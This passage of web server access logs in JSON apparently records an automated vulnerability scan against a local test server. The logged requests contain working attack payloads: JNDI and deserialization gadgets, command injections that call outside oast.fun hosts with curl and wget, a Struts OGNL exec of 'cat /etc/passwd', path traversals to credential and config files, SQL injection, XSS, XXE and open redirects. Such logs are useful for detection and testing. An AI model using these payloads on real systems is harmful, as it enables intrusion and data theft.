Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca2u0eosmpv1jhs80ca0dnmowow5zss8g.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.161","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"\x22name\x22:\x22';$(curl http://ca2u0eosmpv1jhs80ca04bix16mwqqayy.oast.fun);'\x22,\x0D\x0A\x22email\x22:\x22a@b.c\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.161","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca2u0eosmpv1jhs80ca039qghhfx3tof4.oast.fun%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.081","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?7 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74003268747470733a2f2f6361327530656f736d7076316a6873383063613038386e7a67333462756e787a722e6f6173742e66756e74000071007e00057400056874747073707874001968747470733a2f2f746573742e6a6578626f73732e696e666f78\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/SOAPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.162","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendarix/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\x22,\x0D\x0A \x22jndiNames\x22:\x22rmi://ca2u0eosmpv1jhs80ca0pm36gnj5hcnrk.oast.fun/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"@ca2u0eosmpv1jhs80ca0gxrehsbg3w6u3.oast.fun","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.037","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"lang=en_US&cat_id=6\x22>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=/\x5C/evil.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sfwd-lms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22br.com.anteros.dbcp.AnterosDBCPConfig\x22,\x0D\x0A \x22metricRegistry\x22:\x22rmi:/ca2u0eosmpv1jhs80ca0ys4z71bhcxmae.oast.fun/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/downmix.inc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET http://ca2u0eosmpv1jhs80ca01xmasjqebeksu.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.029","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/admin/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /action/usermanager.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=//evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"type=url&data=http%3A%2F%2Fca2u0eosmpv1jhs80ca0gbtu45hujsugo.oast.fun%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/..;/getFavicon?host=ca2u0eosmpv1jhs80ca03dz66z3p57nwx.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.php?search=%22;wget+http%3A%2F%2Fca2u0eosmpv1jhs80ca0cuiumz5mwj1o7.oast.fun%27;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET @ca2u0eosmpv1jhs80ca0epueszc6nntz6.oast.fun/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.010","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", 